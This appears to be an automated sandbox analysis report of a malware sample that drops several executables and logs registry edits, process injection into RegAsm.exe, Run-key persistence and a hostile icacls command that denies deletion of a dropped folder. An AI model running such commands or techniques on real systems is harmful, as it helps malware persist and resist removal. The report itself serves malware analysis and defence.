Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3803511929-1339359695-2191195476-1000\{57D09FF7-050C-4FC1-A514-D9C280D3678D}	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\MuiCache	StartMenuExperienceHost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3803511929-1339359695-2191195476-1000\{AF81CD2C-A49B-4A5A-960F-4D6CC4D37083}	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3803511929-1339359695-2191195476-1000\{E328C71B-C392-4825-B55F-995FAD32B4B2}	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exe

pid	process
4848	file.exe
4848	file.exe
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488
3488

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

file.exeAA98.exe

pid process

4848 file.exe
1800 AA98.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

RegAsm.exe4C5A.exeexplorer.exeexplorer.exe

description	pid	process
Token: SeShutdownPrivilege	3488
Token: SeCreatePagefilePrivilege	3488
Token: SeShutdownPrivilege	3488
Token: SeCreatePagefilePrivilege	3488
Token: SeShutdownPrivilege	3488
Token: SeCreatePagefilePrivilege	3488
Token: SeDebugPrivilege	3796	RegAsm.exe
Token: SeShutdownPrivilege	3488
Token: SeCreatePagefilePrivilege	3488
Token: SeDebugPrivilege	4284	4C5A.exe
Token: SeShutdownPrivilege	3488
Token: SeCreatePagefilePrivilege	3488
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3700	explorer.exe
Token: SeCreatePagefilePrivilege	3700	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe
Token: SeShutdownPrivilege	3552	explorer.exe
Token: SeCreatePagefilePrivilege	3552	explorer.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

explorer.exeexplorer.exe

pid	process
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

explorer.exeexplorer.exeexplorer.exeexplorer.exe

pid	process
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3700	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3552	explorer.exe
3628	explorer.exe
3628	explorer.exe
3628	explorer.exe
3628	explorer.exe
3628	explorer.exe
3628	explorer.exe
3628	explorer.exe
3628	explorer.exe
3628	explorer.exe
3628	explorer.exe
3628	explorer.exe
3628
3628
3628
3628
3628
3628
3628
3628
3628
3628
3628
3628
3628
2500	explorer.exe
2500	explorer.exe
2500	explorer.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

StartMenuExperienceHost.exeStartMenuExperienceHost.exeSearchApp.exeStartMenuExperienceHost.exeSearchApp.exeStartMenuExperienceHost.exeSearchApp.exe

pid	process
4888	StartMenuExperienceHost.exe
4872	StartMenuExperienceHost.exe
2216	SearchApp.exe
644	StartMenuExperienceHost.exe
756	SearchApp.exe
4116	StartMenuExperienceHost.exe
4520	SearchApp.exe

Suspicious use of WriteProcessMemory 62 IoCs

Processes:

C600.exeC600.exeC600.exeF408.exe4C5A.exe

description	pid	process	target process
PID 3488 wrote to memory of 1800	3488		AA98.exe
PID 3488 wrote to memory of 1800	3488		AA98.exe
PID 3488 wrote to memory of 1800	3488		AA98.exe
PID 3488 wrote to memory of 404	3488		C600.exe
PID 3488 wrote to memory of 404	3488		C600.exe
PID 3488 wrote to memory of 404	3488		C600.exe
PID 404 wrote to memory of 3776	404	C600.exe	C600.exe
PID 404 wrote to memory of 3776	404	C600.exe	C600.exe
PID 404 wrote to memory of 3776	404	C600.exe	C600.exe
PID 404 wrote to memory of 3776	404	C600.exe	C600.exe
PID 404 wrote to memory of 3776	404	C600.exe	C600.exe
PID 404 wrote to memory of 3776	404	C600.exe	C600.exe
PID 404 wrote to memory of 3776	404	C600.exe	C600.exe
PID 404 wrote to memory of 3776	404	C600.exe	C600.exe
PID 404 wrote to memory of 3776	404	C600.exe	C600.exe
PID 404 wrote to memory of 3776	404	C600.exe	C600.exe
PID 3776 wrote to memory of 3352	3776	C600.exe	icacls.exe
PID 3776 wrote to memory of 3352	3776	C600.exe	icacls.exe
PID 3776 wrote to memory of 3352	3776	C600.exe	icacls.exe
PID 3776 wrote to memory of 5080	3776	C600.exe	C600.exe
PID 3776 wrote to memory of 5080	3776	C600.exe	C600.exe
PID 3776 wrote to memory of 5080	3776	C600.exe	C600.exe
PID 5080 wrote to memory of 948	5080	C600.exe	C600.exe
PID 5080 wrote to memory of 948	5080	C600.exe	C600.exe
PID 5080 wrote to memory of 948	5080	C600.exe	C600.exe
PID 5080 wrote to memory of 948	5080	C600.exe	C600.exe
PID 5080 wrote to memory of 948	5080	C600.exe	C600.exe
PID 5080 wrote to memory of 948	5080	C600.exe	C600.exe
PID 5080 wrote to memory of 948	5080	C600.exe	C600.exe
PID 5080 wrote to memory of 948	5080	C600.exe	C600.exe
PID 5080 wrote to memory of 948	5080	C600.exe	C600.exe
PID 5080 wrote to memory of 948	5080	C600.exe	C600.exe
PID 3488 wrote to memory of 2400	3488		D738.exe
PID 3488 wrote to memory of 2400	3488		D738.exe
PID 3488 wrote to memory of 2400	3488		D738.exe
PID 3488 wrote to memory of 4616	3488		F408.exe
PID 3488 wrote to memory of 4616	3488		F408.exe
PID 3488 wrote to memory of 4616	3488		F408.exe
PID 4616 wrote to memory of 3796	4616	F408.exe	RegAsm.exe
PID 4616 wrote to memory of 3796	4616	F408.exe	RegAsm.exe
PID 4616 wrote to memory of 3796	4616	F408.exe	RegAsm.exe
PID 4616 wrote to memory of 3796	4616	F408.exe	RegAsm.exe
PID 4616 wrote to memory of 3796	4616	F408.exe	RegAsm.exe
PID 4616 wrote to memory of 3796	4616	F408.exe	RegAsm.exe
PID 4616 wrote to memory of 3796	4616	F408.exe	RegAsm.exe
PID 4616 wrote to memory of 3796	4616	F408.exe	RegAsm.exe
PID 3488 wrote to memory of 4284	3488		4C5A.exe
PID 3488 wrote to memory of 4284	3488		4C5A.exe
PID 3488 wrote to memory of 4284	3488		4C5A.exe
PID 4284 wrote to memory of 4012	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 4012	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 4012	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 1184	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 1184	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 1184	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 1184	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 1184	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 1184	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 1184	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 1184	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 1184	4284	4C5A.exe	4C5A.exe
PID 4284 wrote to memory of 1184	4284	4C5A.exe	4C5A.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4848

C:\Users\Admin\AppData\Local\Temp\AA98.exe
C:\Users\Admin\AppData\Local\Temp\AA98.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1800

C:\Users\Admin\AppData\Local\Temp\C600.exe
C:\Users\Admin\AppData\Local\Temp\C600.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:404

C:\Users\Admin\AppData\Local\Temp\C600.exe
C:\Users\Admin\AppData\Local\Temp\C600.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3776

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\e413230b-f7c4-4632-89d9-5d59f67772cc" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:3352

C:\Users\Admin\AppData\Local\Temp\C600.exe
"C:\Users\Admin\AppData\Local\Temp\C600.exe" --Admin IsNotAutoStart IsNotTask
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5080

C:\Users\Admin\AppData\Local\Temp\C600.exe
"C:\Users\Admin\AppData\Local\Temp\C600.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
PID:948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 568
5⤵
- Program crash
PID:516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 948 -ip 948
1⤵
PID:4144

C:\Users\Admin\AppData\Local\Temp\D738.exe
C:\Users\Admin\AppData\Local\Temp\D738.exe
1⤵
- Executes dropped EXE
PID:2400

C:\Users\Admin\AppData\Local\Temp\F408.exe
C:\Users\Admin\AppData\Local\Temp\F408.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4616

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3796

C:\Users\Admin\AppData\Local\Temp\4C5A.exe
C:\Users\Admin\AppData\Local\Temp\4C5A.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4284

C:\Users\Admin\AppData\Local\Temp\4C5A.exe
C:\Users\Admin\AppData\Local\Temp\4C5A.exe
2⤵
- Executes dropped EXE
PID:4012

C:\Users\Admin\AppData\Local\Temp\4C5A.exe
C:\Users\Admin\AppData\Local\Temp\4C5A.exe
2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1184

C:\Windows\explorer.exe
explorer.exe
1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3700

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4888

C:\Windows\explorer.exe
explorer.exe
1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3552

C:\Windows\explorer.exe
explorer.exe
1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SendNotifyMessage
PID:3628

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:4872

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2216

C:\Windows\explorer.exe
explorer.exe
1⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of SendNotifyMessage
PID:2500

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:644

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
